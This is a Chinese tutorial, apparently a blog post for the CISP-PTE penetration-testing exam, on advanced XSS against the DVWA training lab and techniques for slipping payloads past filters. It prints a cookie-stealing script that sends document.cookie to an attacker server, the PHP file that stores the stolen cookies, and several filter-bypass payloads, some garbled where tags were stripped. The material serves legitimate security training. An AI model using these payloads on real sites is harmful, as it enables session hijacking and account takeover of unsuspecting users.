CISP-PTE XSS进阶实战+Bypass绕过技巧

目录

    • XSS攻击EXP演示
    • XSS攻击bypass技巧
      • 大小写绕过
      • 双写绕过
      • 换行绕过
      • 分段注释绕过
      • 编码绕过
      • 过滤空格
      • 拆分跨站
    • 实战
      • 手工测试
      • 工具测试

通过上篇文章,我们对xss的三种类型以及利用方法有一个大概的了解了,那么接下来我们会讲讲该如何利用xss获取个人信息。

XSS攻击EXP演示

还是以DVWA靶场,获取cookie为例子:
这里用了kali来做为我们接收cookie的服务器,需要先在kali上开启apache。
受害机能访问到kali即可。

systemctl start apache2  //开启apache
systemctl status apache2 //查看服务情况

CISP-PTE XSS进阶实战+Bypass绕过技巧_第1张图片
跳转到/var/www/html/下,新建一个php文件,文件内容如下:


$cookie = $_GET['cookie'];
file_put_contents('cookie.php',$cookie);
?>

CISP-PTE XSS进阶实战+Bypass绕过技巧_第2张图片
返回到html目录下,给html一个777权限,防止实验失败。

cd ..
chmod 777 html

CISP-PTE XSS进阶实战+Bypass绕过技巧_第3张图片
打开dvwa反射型页面,用low等级测试。
POC我们在上一章已经验证过了,就不再验证了,直接开始获取cookie。
在输入框中输入以下脚本

<script>document.location=`http://kali服务器IP/cookie.php?cookie=${document.cookie}`</script>

返回kali,查看cookie.txt文件,可以看到cookie.txt文件已经有cookie信息了
CISP-PTE XSS进阶实战+Bypass绕过技巧_第4张图片
现在来验证一下,还另外一个浏览器中访问dvwa加入cookie,访问index页面
CISP-PTE XSS进阶实战+Bypass绕过技巧_第5张图片
点击发送
CISP-PTE XSS进阶实战+Bypass绕过技巧_第6张图片
更多利用方法可以在xss平台上看看。

XSS攻击bypass技巧

关于bypass技巧,其实无非就是测试这个waf基于什么规则防护。
一般绕过技巧其实对waf不怎么实用,但对于PTE考试的XSS题目绕过有些帮助。

大小写绕过

当拦截机制只检测标签的大写或小写,就可以将标签进行大小写,如

双写绕过

拦截机制检测到标签则会删除该标签,则可以用双写来绕过,如ipt>alert(1)ipt>

换行绕过

当标签内的属性值被拦截了,则可以通过换行(%0a)或者空格(%09)绕过,如下图:
CISP-PTE XSS进阶实战+Bypass绕过技巧_第7张图片

分段注释绕过

这个方法需要有多个接收参数使用,假设有两个参数:name,age,如下图:
在这里插入图片描述

编码绕过

编码绕过只适合对标签的属性值进行编码,并不适用于标签,因为浏览器最早开始解析HTML,将标签转化为内容树中的DOM 节点,此时识别标签的时候,HTML 解析器是无法识别那些被实体编码的内容的,只有建立起DOM 树,才能对每个节点的内容进行识别,如果出现实体编码,则会进行实体解码。如下图:
CISP-PTE XSS进阶实战+Bypass绕过技巧_第8张图片

过滤空格

过滤了空格可以通过/绕过,如

拆分跨站

1,<script>a='alert'</script>
2,<script>a=a+'(1)'</script>
3,<script>eval(a)</script>

这个绕过方法只适用于存储型或者多个参数,如下图:我分了三次在留言中写入以上xss语句,第三句执行了弹窗
CISP-PTE XSS进阶实战+Bypass绕过技巧_第9张图片
CISP-PTE XSS进阶实战+Bypass绕过技巧_第10张图片

实战

以上是关于CISP-PTE可能会考到的xss攻击bypass绕过技巧,这里我再讲一些我平时挖洞的测试流程以及测试方法:

手工测试

1、 确定输出点:输入的参数被输出到了页面中,可能输出位置有一处,也可能有多处
2、 Fuzz测试:测试程序过滤的危险字符内容,知己知彼
3、 构造POC代码:根据输出位置的代码上下文环境,构造可以成功执行的攻击代码。若输出位置有多处,可以选择更容易构造的位置插入代码

关于XSS的绕过,我一般会先测试标签是否可用,首先我会测试标签和标签,这两个标签很难有waf会去拦截,因为网页也可能会调用外部的链接或图片,如果waf拦截了这两个标签,则会导致页面显示出现问题。

其次是关于一些偏僻标签,比如CISP-PTE XSS进阶实战+Bypass绕过技巧_第11张图片

工具测试

1、 AWVS、APPSCANM、Burpsuite、goby等通用web扫描工具均可扫描XSS漏洞
2、 专业的XSS扫描器:XSSER、XSSF等。

你可能感兴趣的:(CISP-PTE实战模拟,xss,web安全,安全)